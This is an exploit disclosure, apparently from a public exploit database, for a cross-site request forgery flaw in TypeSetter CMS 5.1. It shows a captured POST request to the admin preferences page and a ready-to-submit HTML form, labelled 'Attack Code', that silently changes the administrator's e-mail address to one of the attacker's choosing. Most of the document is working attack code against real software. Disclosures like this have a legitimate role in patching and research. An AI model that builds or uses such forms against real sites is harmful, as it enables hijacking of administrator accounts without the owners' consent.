# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail)
# Exploit Author: Alperen Ergel
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Kali & ubuntu
# Category: WebApp

######## Description ########

Attacker can change admin e-mail address 

## Vulnerable

- Go to the admin page view preferences
- Change the e-mail address

######## Proof of Concept ########

===> REQUEST <==== 
POST /typesetter/Admin/Preferences HTTP/1.1
Host: http://localhost/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
Origin: http://localhost/
Connection: close
Referer: http://localhost/typesetter/Admin/Preferences

## < SNIPP > 


verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c
&email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save

#### Attack Code ####

<html>

  <body>

    <form action="http://localhost/typesetter/Admin/Preferences" method="POST">

      <input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" />

      <input type="hidden" name="email" value="[CHANGE HERE]" />

      <input type="hidden" name="oldpassword" value="" />

      <input type="hidden" name="password" value="" />

      <input type="hidden" name="password1" value="" />

      <input type="hidden" name="algo" value="password&#95;hash" />

      <input type="hidden" name="cmd" value="changeprefs" />

      <input type="hidden" name="aaa" value="Save" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>